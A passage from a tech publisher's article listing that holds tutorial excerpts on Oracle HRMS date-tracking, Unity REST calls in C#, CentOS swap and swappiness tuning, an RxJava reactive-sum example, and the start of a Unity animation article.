effective start date of the record. There is no end date for this record, so Oracle gives it a default end date, which is 31-Dec-4712. This is called the effective end date of the record. Now, in our case, Oracle has created a single record with the start date and end date as 01-Jan-2014 and 31-Dec-4712, respectively. When we try to enter additional data for this record (in our case, it is phone number) then Oracle will prompt you to select the Correction or Update option. This is called the date-tracked option. If you select the correction mode, then Oracle will update an existing record in the application. Now, if you date track to, say, 01-Aug-2014 and then enter the phone number and select the update mode, then it will end the historical data with the new date minus one and create a new record with the start date 01-Aug-2014 with the phone number that you have entered. Thus, the historical data will be preserved and a new record will be created with the start date 01-Aug-2014 and a phone number. The following tabular representation will help you understand better in Correction mode: Employee Number LastName Effective Start Date Effective End Date Phone Number 10160 Test010114 01-Jan-2014 31-Dec-4712 +0099999999 Now, if you want to change the phone number from 01-Aug-2014 in Update mode (date 01-Aug-2014), then the record will be as follows: Employee Number LastName Effective Start Date Effective End Date Phone Number 10160 Test010114 01-Jan-2014 31-Jul-2014 +0099999999 10160 Test010114 01-Aug-2014 31-Jul-2014 +0088888888 Thus, in update mode, you can see that historical data is intact. If HR wants to view some historical data, then the HR employee can easily view this data. Everything associated with Oracle HRMS is date-tracked. Every characteristic about the organization, person, position, salary, and benefits is tightly date-tracked. This concept is very important in Oracle and is used in almost all the forms in which you store employee-related information. Thus, you have learned about the date tracking concept in Oracle APPS. There are some additional fields, which can be configured as per your requirements. Additional personal data can be stored in these fields. These are called as descriptive flexfields in Oracle. We created personal DFF to store data about Years of Industry Experience and whether an employee is Oracle Certified or not. This data can be stored in the People form DFF as marked in the following screenshot: When you click on the box, it will open the new form as shown in the following screenshot. Here, you can enter the additional data. This is called Additional Personal Details DFF. It is stored in personal data; this is normally referred to as the People form DFF. We have created a Special Information Types (SIT) to store information on languages known by an employee. This data will have two attributes, namely, the language known and the fluency. This can be entered by navigating to US HRMS Manager | People | Enter and Maintain | Special Info. Click on the Details section. This will open a new form to enter the required details. Each record in the SIT is date-tracked. You can enter the start date and the end date. Thus, we have seen DFF in which you stored additional person data and we have seen KFF, where you enter the SIT data. Summary In this article, you have learned about creating a new employee, entering employee data, and additional data using DFF and KFF. You also learned the concept of person type. Resources for Article: Further resources on this subject: Knowing the prebuilt marketing, sales, and service organizations [article] Oracle E-Business Suite with Desktop Integration [article] Oracle Integration and Consolidation Products [article]
Read more
  • 0
  • 0
  • 7421

article-image-using-rest-api-unity-part-1-what-rest-and-basic-queries
Denny and
24 Jun 2015
6 min read
Save for later

Using a REST API with Unity Part 1

Denny and
24 Jun 2015
6 min read
Introduction While developing a game, there a number of reasons why you would want to connect to a server. Downloading new assets, such as models, or collecting data from an external source is one reason. Downloading bundle assets can be done through your own server, which allows your game to connect to a server and download the most recent versions of bundle assets. Suppose your game also allowed users to see if that item was available at Amazon, and for what price? If you had the sku number available, you could connect to Amazon's API, and check the price and availability of that item. The most common way to connect to external API's these days, is through a RESTful API. What is a REST API A RESTful api is a common approach to creating scalable web services. It provides users with endpoints to collect and create data using the same HTTP calls to collect web pages (GET, POST, PUT, DELETE). For example, a url like www.fake.com/users could return a JSON of User data. Of course, there is often more security involved with these calls, but this is a good starting point. Once you begin understanding REST API's, it becomes very second nature to query them. Before doing anything in code, you can try a query! Go to the browser and go to the url: http://jsonplaceholder.typicode.com/posts. You should be returned a JSON of some post data. You can see REST endpoints in action already. Your browser posted a GET request to the /posts endpoint, which returns all the posts. What if we want just a specific post? The standard way to do this is to add the id of the post next. Like this: http://jsonplaceholder.typicode.com/posts/1. You should get just a single post this time. Great! Often when building Unity scripts to connect to a REST endpoint, we'll frequently use this site to test on, before we move to the actual REST endpoints I want! Setting up your own server Setting up our own server is a bit out of the scope of this article. In previous projects, we've used a framework like Sails JS to create a Node Server, with REST endpoints. Parsing JSON in Unity Basic REST One of the worst parts of querying REST data is the parsing in Unity. Compared to parsing JSON on the web, Unity's parsing can feel tricky. The primary tool we use to make life a little easier is called SimpleJSON. It allows us to create JSON objects in C#, which we can use to build or read JSON data, and then manipulate them to our need. We won't be going into detail on how to use SimpleJSON, as much as just using the data retrieved from it. For further reading, we recommend looking at their documentation. Just to note though, SimpleJSON does not allow for parsing of GameObjects and such in Unity, instead it deals with only more primitive attributes like strings and floats. For example, let's assume we wanted to upload a list of products to a server from our Unity project, without the game running (in editor). Assuming we collected the data from our game and its currently residing in a JSON file, let's see the code on how we can upload this data to the server from Unity. string productlist = File.ReadAllText(Application.dataPath + "/Resources/AssetBundles/" + "AssetBundleInfo.json"); UploadProductListJSON(productList); static void UploadProductListJSON(string data) { Debug.Log (data); WWWForm form = new WWWForm(); form.AddField("productlist", data); WWW www = new WWW("localhost:1337/product/addList", form); } So we pass the collected data to a function that will create a new form, add the data to that form and then use the WWW variable to upload our form to the server. This will use the POST request to add new data. We normally don't want to create a different end point to add data, such as /addList. We could have added data one at a time, and used the standard REST endpoint (/product). This would likely be the cleaner solution, but for the sake of simplicity, we've added an endpoint that accepts a list of data. Building REST Factories for In Game REST Calls Rather than having random scripts containing API calls, we recommend following the standard web procedure and building REST factories. Scripts with the sole purpose of querying rest endpoints. When contacting a server from in game, the standard approach is to use a coroutine, as to not lock your game on the thread. Let's take a look at the standard DB factory we use. private string results; public String Results { get { return results; } } public WWW GET(string url, System.Action onComplete ) { WWW www = new WWW (url); StartCoroutine (WaitForRequest (www, onComplete)); return www; } public WWW POST(string url, Dictionary<string,string> post, System.Action onComplete) { WWWForm form = new WWWForm(); foreach(KeyValuePair<string,string> post_arg in post) { form.AddField(post_arg.Key, post_arg.Value); } WWW www = new WWW(url, form); StartCoroutine(WaitForRequest(www, onComplete)); return www; } private IEnumerator WaitForRequest(WWW www, System.Action onComplete) { yield return www; // check for errors if (www.error == null) { results = www.text; onComplete(); } else { Debug.Log (www.error); } } The url data here would be something like our example above: http://jsonplaceholder.typicode.com/posts. The System.Action OnComplete is a callback to be called once the action is complete. This will normally be some method that requires the downloaded data. In both our GET and POST methods, we will connect to a passed URL, and then pass our www objects to a co-routine. This will allow our game to continue while the queries are being resolved in the WaitForRequest method. This method will either collect the result, and call any callbacks, or it will log the error for us. Conclusion This just touches the basics of building a game that allows connecting and usage of REST endpoints. In later editions, we can talk about building a thorough, modular system to connect to REST endpoints, extracting meaningful data from your queries using simple JSON, user authentication, and how to build a manager system to handle multiple REST calls. About the Authors Denny is a Mobile Application Developer at Canadian Tire Development Operations. While working, Denny regularly uses Unity to create in-store experiences, but also works on other technologies like Famous, Phaser.IO, LibGDX, and CreateJS when creating game-like apps. He also enjoys making non-game mobile apps, but who cares about that, am I right? Travis is a Software Engineer, living in the bitter region of Winnipeg, Canada. His work and hobbies include Game Development with Unity or Phaser.IO, as well as Mobile App Development. He can enjoy a good video game or two, but only if he knows he'll win!
Read more
  • 0
  • 1
  • 23739
Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at $19.99/month. Cancel anytime
article-image-tuning-server-performance-memory-management-and-swap
Packt
24 Jun 2015
7 min read
Save for later

Tuning server performance with memory management and swap

Packt
24 Jun 2015
7 min read
In this article, by Jonathan Hobson, the author of Troubleshooting CentOS, we will learn about memory management, swap, and swappiness. (For more resources related to this topic, see here.) A deeper understanding of the underlying active processes in CentOS 7 is an essential skill for any troubleshooter. From high load averages to slow response times, system overloads to dead and dying processes, there comes a time when every server may start to feel sluggish, act impoverished, or fail to respond, and as a consequence, it will require your immediate attention. Regardless of how you look at it, the question of memory usage remains critical to the life cycle of a system, and whether you are maintaining system health or troubleshooting a particular service or application, you will always need to remember that the use of memory is a critical resource to your system. For this reason, we will begin by calling the free command in the following way: # free -m The main elements of the preceding command will look similar to this:          Total   used   free   shared   buffers   cached Mem:     1837     274   1563         8         0       108 -/+ buffers/cache: 164   1673 Swap:     2063       0   2063 In the example shown, I have used the -m option to ensure that the output is formatted in megabytes. This makes it easier to read, but for the sake of troubleshooting, rather than trying to understand every numeric value shown, let's reduce the scope of the original output to highlight the relevant area of concern: -/+ buffers/cache: 164   1673 The importance of this line is based on the fact that it accounts for the associated buffers and caches to illustrate what memory is currently being used and what is held in reserve. Where the first value indicates how much memory is being used, the second value tells us how much memory is available to our applications. In the example shown, this instance translates into 164 MB of used memory and 1673 MB of available memory. Bearing this in mind, let me draw your attention to the final line in order that we can examine the importance of swap: Swap:     2063       0   2063 Swapping typically occurs when memory usage is impacting performance. As we can see from the preceding example, the first value tells us that there is a total amount of system swap set at 2063 MB, with the second value indicating how much swap is being used (0 MB), while the third value shows the amount of swap that is still available to the system as a whole (2063 MB). So yes, based on the example data shown here, we can conclude that this is a healthy system, and no swap is being used, but while we are here, let's use this time to discover more about the swap space on your system. To begin, we will revisit the contents of the proc directory and reveal the total and used swap size by typing the following command: # cat /proc/swaps Assuming that you understand the output shown, you should then investigate the level of swappiness used by your system with the following command: # cat /proc/sys/vm/swappiness Having done this, you will now see a numeric value between the ranges of 0-100. The numeric value is a percentage and it implies that, if your system has a value of 30, for example, it will begin to use swap memory at 70 percent occupation of RAM. The default for all Linux systems is usually set with a notional value between 30 to 60, but you can use either of the following commands to temporarily change and modify the swappiness of your system. This can be achieved by replacing the value of X with a numeric value from 1-100 by typing: # echo X > /proc/sys/vm/swappiness Or more specifically, this can also be achieved with: # sysctl -w vm.swappiness=X If you change your mind at any point, then you have two options in order to ensure that no permanent changes have been made. You can either repeat one of the preceding two commands and return the original values, or issue a full system reboot. On the other hand, if you want to make the change persist, then you should edit the /etc/sysctl.conf file and add your swappiness preferences in the following way: vm.swappiness=X When complete, simply save and close the file to ensure that the changes take effect. The level of swappiness controls the tendency of the kernel to move a process out of the physical RAM on to a swap disk. This is memory management at work, but it is important to realize that swapping will not occur immediately, as the level of swappiness is actually expressed as a percentage value. For this reason, the process of swapping should be viewed more as a measurement of preference when using the cache, and as every administrator will know, there is an option for you to clear the swap by using the commands swapoff -a and swapon -a to achieve the desired result. The golden rule is to realize that a system displaying a level of swappiness close to the maximum value (100) will prefer to begin swapping inactive pages. This is because a value of 100 is a representative of 0 percent occupation of RAM. By comparison, the closer your system is to the lowest value (0), the less likely swapping is to occur as 0 is representative of 100 percent occupation of RAM. Generally speaking, we would all probably agree that systems with a very large pool of RAM would not benefit from aggressive swapping. However, and just to confuse things further, let's look at it in a different way. We all know that a desktop computer will benefit from a low swappiness value, but in certain situations, you may also find that a system with a large pool of RAM (running batch jobs) may also benefit from a moderate to aggressive swap in a fashion similar to a system that attempts to do a lot but only uses small amounts of RAM. So, in reality, there are no hard and fast rules; the use of swap should be based on the needs of the system in question rather than looking for a single solution that can be applied across the board. Taking this further, special care and consideration should be taken while making changes to the swapping values as RAM that is not used by an application is used as disk cache. In this situation, by decreasing swappiness, you are actually increasing the chance of that application not being swapped-out, and you are thereby decreasing the overall size of the disk cache. This can make disk access slower. However, if you do increase the preference to swap, then because hard disks are slower than memory modules, it can lead to a slower response time across the overall system. Swapping can be confusing, but by knowing this, we can also appreciate the hidden irony of swappiness. As Newton's third law of motion states, for every action, there is an equal and opposite reaction, and finding the optimum swappiness value may require some additional experimentation. Summary In this article, we learned some basic yet vital commands that help us gauge and maintain server performance with the help of swapiness. Resources for Article: Further resources on this subject: Installing CentOS [article] Managing public and private groups [article] Installing PostgreSQL [article]
Read more
  • 0
  • 0
  • 5030

article-image-introduction-reactive-programming
Packt
24 Jun 2015
23 min read
Save for later

An Introduction to Reactive Programming

Packt
24 Jun 2015
23 min read
In this article written by Nickolay Tsvetinov, author of the book Learning Reactive Programming with Java 8, this article will present RxJava (https://github.com/ReactiveX/RxJava), an open source Java implementation of the reactive programming paradigm. Writing code using RxJava requires a different kind of thinking, but it will give you the power to create complex logic using simple pieces of well-structured code. In this article, we will cover: What reactive programming is Reasons to learn and use this style of programming Setting up RxJava and comparing it with familiar patterns and structures A simple example with RxJava (For more resources related to this topic, see here.) What is reactive programming? Reactive programming is a paradigm that revolves around the propagation of change. In other words, if a program propagates all the changes that modify its data to all the interested parties (users, other programs, components, and subparts), then this program can be called reactive. A simple example of this is Microsoft Excel. If you set a number in cell A1 and another number in cell 'B1', and set cell 'C1' to SUM(A1, B1); whenever 'A1' or 'B1' changes, 'C1' will be updated to be their sum. Let's call this the reactive sum. What is the difference between assigning a simple variable c to be equal to the sum of the a and b variables and the reactive sum approach? In a normal Java program, when we change 'a' or 'b', we will have to update 'c' ourselves. In other words, the change in the flow of the data represented by 'a' and 'b', is not propagated to 'c'. Here is this illustrated through source code: int a = 4; int b = 5; int c = a + b; System.out.println(c); // 9   a = 6; System.out.println(c); // 9 again, but if 'c' was tracking the changes of 'a' and 'b', // it would've been 6 + 5 = 11 This is a very simple explanation of what "being reactive" means. Of course, there are various implementations of this idea and there are various problems that these implementations must solve. Why should we be reactive? The easiest way for us to answer this question is to think about the requirements we have while building applications these days. While 10-15 years ago it was normal for websites to go through maintenance or to have a slow response time, today everything should be online 24/7 and should respond with lightning speed; if it's slow or down, users would prefer an alternative service. Today slow means unusable or broken. We are working with greater volumes of data that we need to serve and process fast. HTTP failures weren't something rare in the recent past, but now, we have to be fault-tolerant and give our users readable and reasonable message updates. In the past, we wrote simple desktop applications, but today we write web applications, which should be fast and responsive. In most cases, these applications communicate with a large number of remote services. These are the new requirements we have to fulfill if we want our software to be competitive. So in other words we have to be: Modular/dynamic: This way, we will be able to have 24/7 systems, because modules can go offline and come online without breaking or halting the entire system. Additionally, this helps us better structure our applications as they grow larger and manage their code base. Scalable: This way, we are going to be able to handle a huge amount of data or large numbers of user requests. Fault-tolerant: This way, the system will appear stable to its users. Responsive: This means fast and available. Let's think about how to accomplish this: We can become modular if our system is event-driven. We can divide the system into multiple micro-services/components/modules that are going to communicate with each other using notifications. This way, we are going to react to the data flow of the system, represented by notifications. To be scalable means to react to the ever-growing data, to react to load without falling apart. Reacting to failures/errors will make the system more fault-tolerant. To be responsive means reacting to user activity in a timely manner. If the application is event-driven, it can be decoupled into multiple self-contained components. This helps us become more scalable, because we can always add new components or remove old ones without stopping or breaking the system. If errors and failures are passed to the right component, which can handle them as notifications, the application can become more fault-tolerant or resilient. So if we build our system to be event-driven, we can more easily achieve scalability and failure tolerance, and a scalable, decoupled, and error-proof application is fast and responsive to users. The Reactive Manifesto (http://www.reactivemanifesto.org/) is a document defining the four reactive principles that we mentioned previously. Each reactive system should be message-driven (event-driven). That way, it can become loosely coupled and therefore scalable and resilient (fault-tolerant), which means it is reliable and responsive (see the preceding diagram). Note that the Reactive Manifesto describes a reactive system and is not the same as our definition of reactive programming. You can build a message-driven, resilient, scalable, and responsive application without using a reactive library or language. Changes in the application data can be modeled with notifications, which can be propagated to the right handlers. So, writing applications using reactive programming is the easiest way to comply with the Manifesto. Introducing RxJava To write reactive programs, we need a library or a specific programming language, because building something like that ourselves is quite a difficult task. Java is not really a reactive programming language (it provides some tools like the java.util.Observable class, but they are quite limited). It is a statically typed, object-oriented language, and we write a lot of boilerplate code to accomplish simple things (POJOs, for example). But there are reactive libraries in Java that we can use. In this article, we will be using RxJava (developed by people in the Java open source community, guided by Netflix). Downloading and setting up RxJava You can download and build RxJava from Github (https://github.com/ReactiveX/RxJava). It requires zero dependencies and supports Java 8 lambdas. The documentation provided by its Javadoc and the GitHub wiki pages is well structured and some of the best out there. Here is how to check out the project and run the build: $ git clone git@github.com:ReactiveX/RxJava.git $ cd RxJava/ $ ./gradlew build Of course, you can also download the prebuilt JAR. For this article, we'll be using version 1.0.8. If you use Maven, you can add RxJava as a dependency to your pom.xml file: <dependency> <groupId>io.reactivex</groupId> <artifactId>rxjava</artifactId> <version>1.0.8</version> </dependency> Alternatively, for Apache Ivy, put this snippet in your Ivy file's dependencies: <dependency org="io.reactivex" name="rxjava" rev="1.0.8" /> If you use Gradle instead, update your build.gradle file's dependencies as follows: dependencies { ... compile 'io.reactivex:rxjava:1.0.8' ... } Now, let's take a peek at what RxJava is all about. We are going to begin with something well known, and gradually get into the library's secrets. Comparing the iterator pattern and the RxJava observable As a Java programmer, it is highly possible that you've heard or used the Iterator pattern. The idea is simple: an Iterator instance is used to traverse through a container (collection/data source/generator), pulling the container's elements one by one when they are required, until it reaches the container's end. Here is a little example of how it is used in Java: List<String> list = Arrays.asList("One", "Two", "Three", "Four", "Five"); // (1)   Iterator<String> iterator = list.iterator(); // (2)   while(iterator.hasNext()) { // 3 // Prints elements (4) System.out.println(iterator.next()); } Every java.util.Collection object is an Iterable instance which means that it has the method iterator(). This method creates an Iterator instance, which has as its source the collection. Let's look at what the preceding code does: We create a new List instance containing five strings. We create an Iterator instance from this List instance, using the iterator() method. The Iterator interface has two important methods: hasNext() and next(). The hasNext() method is used to check whether the Iterator instance has more elements for traversing. Here, we haven't begun going through the elements, so it will return True. When we go through the five strings, it will return False and the program will proceed after the while loop. The first five times, when we call the next() method on the Iterator instance, it will return the elements in the order they were inserted in the collection. So the strings will be printed. In this example, our program consumes the items from the List instance using the Iterator instance. It pulls the data (here, represented by strings) and the current thread blocks until the requested data is ready and received. So, for example, if the Iterator instance was firing a request to a web server on every next() method call, the main thread of our program would be blocked while waiting for each of the responses to arrive. RxJava's building blocks are the observables. The Observable class (note that this is not the java.util.Observable class that comes with the JDK) is the mathematical dual of the Iterator class, which basically means that they are like the two sides of the same coin. It has an underlying collection or computation that produces values that can be consumed by a consumer. But the difference is that the consumer doesn't "pull" these values from the producer like in the Iterator pattern. It is exactly the opposite; the producer 'pushes' the values as notifications to the consumer. Here is an example of the same program but written using an Observable instance: List<String> list = Arrays.asList("One", "Two", "Three", "Four", "Five"); // (1)   Observable<String> observable = Observable.from(list); // (2)   observable.subscribe(new Action1<String>() { // (3) @Override public void call(String element) {    System.out.println(element); // Prints the element (4) } }); Here is what is happening in the code: We create the list of strings in the same way as in the previous example. Then, we create an Observable instance from the list, using the from(Iterable<? extends T> iterable) method. This method is used to create instances of Observable that send all the values synchronously from an Iterable instance (the list in our case) one by one to their subscribers (consumers). Here, we can subscribe to the Observable instance. By subscribing, we tell RxJava that we are interested in this Observable instance and want to receive notifications from it. We subscribe using an anonymous class implementing the Action1 interface, by defining a single method—call(T). This method will be called by the Observable instance every time it has a value, ready to be pushed. Always creating new Action1 instances may seem too verbose, but Java 8 solves this verbosity. So, every string from the source list will be pushed through to the call() method, and it will be printed. Instances of the RxJava Observable class behave somewhat like asynchronous iterators, which notify that there is a next value their subscribers/consumers by themselves. In fact, the Observable class adds to the classic Observer pattern (implemented in Java—see java.util.Observable, see Design Patterns: Elements of Reusable Object-Oriented Software by the Gang Of Four) two things available in the Iterable type. The ability to signal the consumer that there is no more data available. Instead of calling the hasNext() method, we can attach a subscriber to listen for a 'OnCompleted' notification. The ability to signal the subscriber that an error has occurred. Instead of try-catching an error, we can attach an error listener to the Observable instance. These listeners can be attached using the subscribe(Action1<? super T>, Action1 <Throwable>, Action0) method. Let's expand the Observable instance example by adding error and completed listeners: List<String> list = Arrays.asList("One", "Two", "Three", "Four", "Five");   Observable<String> observable = Observable.from(list); observable.subscribe(new Action1<String>() { @Override public void call(String element) {    System.out.println(element); } }, new Action1<Throwable>() { @Override public void call(Throwable t) {    System.err.println(t); // (1) } }, new Action0() { @Override public void call() {    System.out.println("We've finnished!"); // (2) } }); The new things here are: If there is an error while processing the elements, the Observable instance will send this error through the call(Throwable) method of this listener. This is analogous to the try-catch block in the Iterator instance example. When everything finishes, this call() method will be invoked by the Observable instance. This is analogous to using the hasNext() method in order to see if the traversal over the Iterable instance has finished and printing "We've finished!". We saw how we can use the Observable instances and that they are not so different from something familiar to us—the Iterator instance. These Observable instances can be used for building asynchronous streams and pushing data updates to their subscribers (they can have multiple subscribers).This is an implementation of the reactive programming paradigm. The data is being propagated to all the interested parties—the subscribers. Coding using such streams is a more functional-like implementation of Reactive Programming. Of course, there are formal definitions and complex terms for it, but this is the simplest explanation. Subscribing to events should be familiar; for example, clicking on a button in a GUI application fires an event which is propagated to the subscribers—handlers. But, using RxJava, we can create data streams from anything—file input, sockets, responses, variables, caches, user inputs, and so on. On top of that, consumers can be notified that the stream is closed, or that there has been an error. So, by using these streams, our applications can react to failure. To summarize, a stream is a sequence of ongoing messages/events, ordered as they are processed in real time. It can be looked at as a value that is changing through time, and these changes can be observed by subscribers (consumers), dependent on it. So, going back to the example from Excel, we have effectively replaced the traditional variables with "reactive variables" or RxJava's Observable instances. Implementing the reactive sum Now that we are familiar with the Observable class and the idea of how to use it to code in a reactive way, we are ready to implement the reactive sum, mentioned at the beginning of this article. Let's look at the requirements our program must fulfill: It will be an application that runs in the terminal. Once started, it will run until the user enters exit. If the user enters a:<number>, the a collector will be updated to the <number>. If the user enters b:<number>, the b collector will be updated to the <number>. If the user enters anything else, it will be skipped. When both the a and b collectors have initial values, their sum will automatically be computed and printed on the standard output in the format a + b = <sum>. On every change in a or b, the sum will be updated and printed. The first piece of code represents the main body of the program: ConnectableObservable<String> input = from(System.in); // (1)   Observable<Double> a = varStream("a", input); (2) Observable<Double> b = varStream("b", input);   ReactiveSum sum = new ReactiveSum(a, b); (3)   input.connect(); (4) There are a lot of new things happening here: The first thing we must do is to create an Observable instance, representing the standard input stream (System.in). So, we use the from(InputStream) method (implementation will be presented in the next code snippet) to create a ConnectableObservable variable from the System.in. The ConnectableObservable variable is an Observable instance and starts emitting events coming from its source only after its connect() method is called. We create two Observable instances representing the a and b values, using the varStream(String, Observable) method, which we are going to examine later. The source stream for these values is the input stream. We create a ReactiveSum instance, dependent on the a and b values. And now, we can start listening to the input stream. This code is responsible for building dependencies in the program and starting it off. The a and b values are dependent on the user input and their sum is dependent on them. Now let's look at the implementation of the from(InputStream) method, which creates an Observable instance with the java.io.InputStream source: static ConnectableObservable<String> from(final InputStream stream) { return from(new BufferedReader(new InputStreamReader(stream)));   // (1) }   static ConnectableObservable<String> from(final BufferedReader reader) { return Observable.create(new OnSubscribe<String>() { // (2)    @Override    public void call(Subscriber<? super String> subscriber) {      if (subscriber.isUnsubscribed()) { // (3)        return;      }      try {        String line;        while(!subscriber.isUnsubscribed() &&          (line = reader.readLine()) != null) { // (4)            if (line == null || line.equals("exit")) { // (5)              break;            }            subscriber.onNext(line); // (6)          }        }        catch (IOException e) { // (7)          subscriber.onError(e);        }        if (!subscriber.isUnsubscribed()) // (8)        subscriber.onCompleted();      }    } }).publish(); // (9) } This is one complex piece of code, so let's look at it step-by-step: This method implementation converts its InputStream parameter to the BufferedReader object and to calls the from(BufferedReader) method. We are doing that because we are going to use strings as data, and working with the Reader instance is easier. So the actual implementation is in the second method. It returns an Observable instance, created using the Observable.create(OnSubscribe) method. This method is the one we are going to use the most in this article. It is used to create Observable instances with custom behavior. The rx.Observable.OnSubscribe interface passed to it has one method, call(Subscriber). This method is used to implement the behavior of the Observable instance because the Subscriber instance passed to it can be used to emit messages to the Observable instance's subscriber. A subscriber is the client of an Observable instance, which consumes its notifications. If the subscriber has already unsubscribed from this Observable instance, nothing should be done. The main logic is to listen for user input, while the subscriber is subscribed. Every line the user enters in the terminal is treated as a message. This is the main loop of the program. If the user enters the word exit and hits Enter, the main loop stops. Otherwise, the message the user entered is passed as a notification to the subscriber of the Observable instance, using the onNext(T) method. This way, we pass everything to the interested parties. It's their job to filter out and transform the raw messages. If there is an IO error, the subscribers are notified with an OnError notification through the onError(Throwable) method. If the program reaches here (through breaking out of the main loop) and the subscriber is still subscribed to the Observable instance, an OnCompleted notification is sent to the subscribers using the onCompleted() method. With the publish() method, we turn the new Observable instance into ConnectableObservable instance. We have to do this because, otherwise, for every subscription to this Observable instance, our logic will be executed from the beginning. In our case, we want to execute it only once and all the subscribers to receive the same notifications; this is achievable with the use of a ConnectableObservable instance. This illustrates a simplified way to turn Java's IO streams into Observable instances. Of course, with this main loop, the main thread of the program will block waiting for user input. This can be prevented using the right Scheduler instances to move the logic to another thread. Now, every line the user types into the terminal is propagated as a notification by the ConnectableObservable instance created by this method. The time has come to look at how we connect our value Observable instances, representing the collectors of the sum, to this input Observable instance. Here is the implementation of the varStream(String, Observable) method, which takes a name of a value and source Observable instance and returns an Observable instance representing this value: public static Observable<Double> varStream(final String varName, Observable<String> input) { final Pattern pattern = Pattern.compile("\^s*" + varName +   "\s*[:|=]\s*(-?\d+\.?\d*)$"); // (1) return input .map(new Func1<String, Matcher>() {    public Matcher call(String str) {      return pattern.matcher(str); // (2)    } }) .filter(new Func1<Matcher, Boolean>() {    public Boolean call(Matcher matcher) {      return matcher.matches() && matcher.group(1) != null; //       (3)    } }) .map(new Func1<Matcher, Double>() {    public Double call(Matcher matcher) {      return Double.parseDouble(matcher.group(1)); // (4)    } }); } The map() and filter() methods called on the Observable instance here are part of the fluent API provided by RxJava. They can be called on an Observable instance, creating a new Observable instance that depends on these methods and that transforms or filters the incoming data. Using these methods the right way, you can express complex logic in a series of steps leading to your objective: Our variables are interested only in messages in the format <var_name>: <value> or <var_name> = <value>, so we are going to use this regular expression to filter and process only these kinds of messages. Remember that our input Observable instance sends each line the user writes; it is our job to handle it the right way. Using the messages we receive from the input, we create a Matcher instance using the preceding regular expression as a pattern. We pass through only data that matches the regular expression. Everything else is discarded. Here, the value to set is extracted as a Double number value. This is how the values a and b are represented by streams of double values, changing in time. Now we can implement their sum. We implemented it as a class that implements the Observer interface, because I wanted to show you another way of subscribing to Observable instances—using the Observer interface. Here is the code: public static final class ReactiveSum implements Observer<Double> { // (1) private double sum; public ReactiveSum(Observable<Double> a, Observable<Double> b) {    this.sum = 0;    Observable.combineLatest(a, b, new Func2<Double, Double,     Double>() { // (5)      public Double call(Double a, Double b) {       return a + b;      }    }).subscribe(this); // (6) } public void onCompleted() {    System.out.println("Exiting last sum was : " + this.sum); //     (4) } public void onError(Throwable e) {    System.err.println("Got an error!"); // (3)    e.printStackTrace(); } public void onNext(Double sum) {    this.sum = sum;    System.out.println("update : a + b = " + sum); // (2) } } This is the implementation of the actual sum, dependent on the two Observable instances representing its collectors: It is an Observer interface. The Observer instance can be passed to the Observable instance's subscribe(Observer) method and defines three methods that are named after the three types of notification: onNext(T), onError(Throwable), and onCompleted. In our onNext(Double) method implementation, we set the sum to the incoming value and print an update to the standard output. If we get an error, we just print it. When everything is done, we greet the user with the final sum. We implement the sum with the combineLatest(Observable, Observable, Func2) method. This method creates a new Observable instance. The new Observable instance is updated when any of the two Observable instances, passed to combineLatest receives an update. The value emitted through the new Observable instance is computed by the third parameter—a function that has access to the latest values of the two source sequences. In our case, we sum up the values. There will be no notification until both of the Observable instances passed to the method emit at least one value. So, we will have the sum only when both a and b have notifications. We subscribe our Observer instance to the combined Observable instance. Here is sample of what the output of this example would look like: Reacitve Sum. Type 'a: <number>' and 'b: <number>' to try it. a:4 b:5 update : a + b = 9.0 a:6 update : a + b = 11.0 So this is it! We have implemented our reactive sum using streams of data. Summary In this article, we went through the reactive principles and the reasons we should learn and use them. It is not so hard to build a reactive application; it just requires structuring the program in little declarative steps. With RxJava, this can be accomplished by building multiple asynchronous streams connected the right way, transforming the data all the way through its consumer. The two examples presented in this article may look a bit complex and confusing at first glance, but in reality, they are pretty simple. If you want to read more about reactive programming, take a look at Reactive Programming in the Netflix API with RxJava, a fine article on the topic, available at http://techblog.netflix.com/2013/02/rxjava-netflix-api.html. Another fine post introducing the concept can be found here: https://gist.github.com/staltz/868e7e9bc2a7b8c1f754. And these are slides about reactive programming and RX by Ben Christensen, one of the creators of RxJava: https://speakerdeck.com/benjchristensen/reactive-programming-with-rx-at-qconsf-2014. Resources for Article: Further resources on this subject: The Observer Pattern [article] The Five Kinds of Python Functions Python 3.4 Edition [article] Discovering Python's parallel programming tools [article]
Read more
  • 0
  • 0
  • 4496

article-image-animation-fundamentals
Packt
24 Jun 2015
12 min read
Save for later

Animation Fundamentals

Packt
24 Jun 2015
12 min read
In this article by Alan Thorn, author of the book, Unity Animation Essentials, you learn the fundamentals of animation. The importance of animation cannot be understated. Without animation, everything in-game would be statuesque, lifeless and perhaps boring. This holds true for nearly everything in games: doors must open, characters must move, foliage should sway with the wind, sparkles and particles should explode and shine, and so on. Consequently, learning animation and how to animate properly will unquestionably empower you as a developer, no matter what your career plans are. As a subject, animation creeps unavoidably into most game fields, and it's a critical concern for all members of a team—obviously for artists and animators, but also for programmers, sound designers, and level designers. The aim is to quickly and effectively introduce the fundamental concepts and practices surrounding animation in real-time games, specifically animation in Unity. You will be capable of making effective animations that express your artistic vision, as well as gaining an understanding of how and where you can expand your knowledge to the next level. But to reach that stage we'll begin, with the most basic concepts of animation—the groundwork for any understanding of animation. (For more resources related to this topic, see here.) Understanding animation At its most fundamental level, animation is about a relationship between two specific and separate properties, namely change on one hand and time on the other. Technically, animation defines change over time, that is, how a property adjusts or varies across time, such as how the position of a car changes over time, or how the color of a traffic light transitions over time from red to green. Thus, every animation occurs for a total length of time (duration), and throughout its lifetime, the properties of the objects will change at specific moments (frames), anywhere from the beginning to the end of the animation. This definition is itself technical and somewhat dry, but relevant and important. However, it fails to properly encompass the aesthetic and artistic properties of animation. Through animation and through creative changes in properties over time, moods, atmospheres, worlds, and ideas can be conveyed effectively. Even so, the emotional and artistic power that comes from animation is ultimately a product of the underlying relationship of change with time. Within this framework of change over time, we may identify further key terms, specifically in computer animation. You may already be familiar with these concepts, but let's define them more formally. Frames Within an animation, time must necessarily be divided into separate and discrete units where change can occur. These units are called frames. Time is essentially a continuous and unbreakable quantity, insofar as you can always subdivide time (such as a second) to get an even smaller unit of time (such as a millisecond), and so on. In theory, this process of subdivision could essentially be carried on ad infinitum, resulting in smaller and smaller fractions of time. The concept of amoment or eventin time is, by contrast, a human-made, discrete, and self-contained entity. It is a discrete thing that we perceive in time to make our experience of the world more intelligible. Unlike time, a moment is what it is, and it cannot be broken down into something smaller without ceasing to exist altogether. Inside a moment, or a frame, things can happen. A frame is an opportunity for properties to change—for doors to open, characters to move, colors to change, and more. In video game animation specifically, each 